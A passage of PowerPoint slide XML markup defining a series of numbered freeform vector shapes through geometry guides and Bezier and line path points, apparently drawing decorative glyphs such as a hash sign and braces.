                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="42"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99"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Freeform 372"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2672" y="188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Freeform 373"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2684" y="1883"/>
                <a:ext cx="5" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0 h 2"/>
                  <a:gd name="T4" fmla="*/ 4 w 4"/>
                  <a:gd name="T5" fmla="*/ 1 h 2"/>
                  <a:gd name="T6" fmla="*/ 2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0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4"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Freeform 374"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2043"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Freeform 375"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 376"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2342" y="37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Freeform 377"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="249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Freeform 378"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2687"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Freeform 379"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2837"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Freeform 380"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="298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Freeform 381"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3182"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Freeform 382"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3332"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Freeform 383"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="371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Freeform 384"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3905"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Freeform 385"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="410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2" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="12"/>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Freeform 386"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4285" y="379"/>
                <a:ext cx="189" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 66 h 218"/>
                  <a:gd name="T2" fmla="*/ 184 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 130 w 189"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 134 h 218"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 151 h 218"/>
                  <a:gd name="T12" fmla="*/ 127 w 189"/>
                  <a:gd name="T13" fmla="*/ 151 h 218"/>
                  <a:gd name="T14" fmla="*/ 112 w 189"/>
                  <a:gd name="T15" fmla="*/ 218 h 218"/>
                  <a:gd name="T16" fmla="*/ 91 w 189"/>
                  <a:gd name="T17" fmla="*/ 218 h 218"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 151 h 218"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 151 h 218"/>
                  <a:gd name="T22" fmla="*/ 50 w 189"/>
                  <a:gd name="T23" fmla="*/ 218 h 218"/>
                  <a:gd name="T24" fmla="*/ 29 w 189"/>
                  <a:gd name="T25" fmla="*/ 218 h 218"/>
                  <a:gd name="T26" fmla="*/ 43 w 189"/>
                  <a:gd name="T27" fmla="*/ 151 h 218"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 151 h 218"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 134 h 218"/>
                  <a:gd name="T32" fmla="*/ 48 w 189"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 57 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 218"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 66 h 218"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 66 h 218"/>
                  <a:gd name="T42" fmla="*/ 74 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 218"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 218"/>
                  <a:gd name="T46" fmla="*/ 82 w 189"/>
                  <a:gd name="T47" fmla="*/ 66 h 218"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 66 h 218"/>
                  <a:gd name="T50" fmla="*/ 138 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 218"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 218"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 66 h 218"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 66 h 218"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 218"/>
                  <a:gd name="T60" fmla="*/ 78 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 67 w 189"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 110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6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="66"/>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Freeform 387"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4502"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Freeform 388"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="469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Freeform 389"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4894"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Freeform 390"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5043" y="374"/>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Freeform 391"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5241" y="372"/>
                <a:ext cx="82"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Freeform 392"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5389"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Freeform 393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5539"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Freeform 394"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5687"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Freeform 395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877" y="379"/>
                <a:ext cx="78" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 240 h 240"/>
                  <a:gd name="T2" fmla="*/ 22 w 64"/>
                  <a:gd name="T3" fmla="*/ 198 h 240"/>
                  <a:gd name="T4" fmla="*/ 22 w 64"/>
                  <a:gd name="T5" fmla="*/ 157 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 128 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 112 h 240"/>
                  <a:gd name="T10" fmla="*/ 22 w 64"/>
                  <a:gd name="T11" fmla="*/ 82 h 240"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 42 h 240"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 0 h 240"/>
                  <a:gd name="T16" fmla="*/ 64 w 64"/>
                  <a:gd name="T17" fmla="*/ 17 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 64"/>
                  <a:gd name="T19" fmla="*/ 44 h 240"/>
                  <a:gd name="T20" fmla="*/ 42 w 64"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 64"/>
                  <a:gd name="T23" fmla="*/ 119 h 240"/>
                  <a:gd name="T24" fmla="*/ 21 w 64"/>
                  <a:gd name="T25" fmla="*/ 120 h 240"/>
                  <a:gd name="T26" fmla="*/ 42 w 64"/>
                  <a:gd name="T27" fmla="*/ 155 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 194 h 240"/>
                  <a:gd name="T30" fmla="*/ 47 w 64"/>
                  <a:gd name="T31" fmla="*/ 216 h 240"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 223 h 240"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>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240"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="240"/>
                      <a:pt x="22" y="226"/>
                      <a:pt x="22" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="138"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="111"/>
                      <a:pt x="22" y="101"/>
                      <a:pt x="22" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="42"/>
                      <a:pt x="22" y="42"/>
                      <a:pt x="22" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="14"/>
                      <a:pt x="36" y="0"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="17"/>
                      <a:pt x="64" y="17"/>
                      <a:pt x="64" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="17"/>
                      <a:pt x="42" y="26"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="103"/>
                      <a:pt x="35" y="115"/>
                      <a:pt x="21" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="124"/>
                      <a:pt x="42" y="136"/>
                      <a:pt x="42" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="194"/>
                      <a:pt x="42" y="194"/>
                      <a:pt x="42" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="47" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="220"/>
                      <a:pt x="55" y="223"/>
                      <a:pt x="64" y="223"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64"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Freeform 396"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5985" y="379"/>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4 h 240"/>
                  <a:gd name="T14" fmla="*/ 21 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 119 h 240"/>
                  <a:gd name="T20" fmla="*/ 21 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 41 w 63"/>
                  <a:gd name="T29" fmla="*/ 42 h 240"/>
                  <a:gd name="T30" fmla="*/ 41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1" y="138"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="240"/>
                      <a:pt x="0" y="240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="223"/>
                      <a:pt x="13" y="220"/>
                      <a:pt x="16" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="204"/>
                      <a:pt x="21" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>
                      <a:pt x="28" y="124"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="119"/>
                      <a:pt x="42" y="119"/>
                      <a:pt x="42" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="115"/>
                      <a:pt x="21" y="103"/>
                      <a:pt x="21" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="26"/>
                      <a:pt x="14" y="17"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="0"/>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="82"/>
                      <a:pt x="41" y="82"/>
                      <a:pt x="41" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41"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Freeform 397"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6092"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 name="Freeform 398"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6240"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7"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Freeform 399"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="643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Freeform 400"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6634"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401"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6781"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Freeform 402"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6978"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403"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="712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Freeform 404"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7325"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405"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7473" y="374"/>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1" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="35" y="196"/>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406"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7671"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Freeform 407"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3461" y="36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8"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>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2"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33"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9"/>
                      <a:pt x="154" y="151"/>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1" y="189"/>
                      <a:pt x="121" y="192"/>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4"/>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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>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2"/>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8"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="65" y="182"/>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4" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116"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8"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>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8"/>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8" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="35"/>
